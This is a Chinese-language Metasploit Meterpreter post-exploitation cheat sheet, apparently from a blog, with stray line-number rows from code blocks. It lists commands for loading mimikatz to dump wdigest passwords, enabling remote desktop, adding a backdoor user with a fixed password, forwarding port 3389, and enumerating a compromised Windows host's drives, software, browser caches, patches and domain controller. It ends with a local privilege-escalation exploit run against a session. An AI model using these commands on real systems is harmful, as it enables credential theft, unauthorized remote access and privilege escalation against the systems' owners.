load mimikatz 加载mimikatz模块 help mimikatz 查看帮助 wdigest 获取密码
开启远程桌面
1 2 3 4 5
run vnc 使用vnc连接远程桌面 run getgui -e 开启远程桌面 run post/windows/manage/enable_rdp 开启远程桌面 run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456 添加用户 run post/windows/manage/enable_rdp FORWARD=trueLPORT=6662 将3389端口转发到6662
收集信息
1 2 3 4 5 6 7 8 9
run post/windows/gather/checkvm #是否虚拟机 run post/linux/gather/checkvm #是否虚拟机 run post/windows/gather/forensics/enum_drives #查看分区 run post/windows/gather/enum_applications #获取安装软件信息 run post/windows/gather/dumplinks #获取最近的文件操作 run post/windows/gather/enum_ie #获取IE缓存 run post/windows/gather/enum_chrome #获取Chrome缓存 run post/windows/gather/enum_patches #补丁信息 run post/windows/gather/enum_domain #查找域控
针对未安装补丁攻击
1 2 3 4 5
runpost/windows/gather/enum_patches 收集补丁信息 攻击: msf > use exploit/windows/local/xxxx msf > set SESSION 2 msf > exploit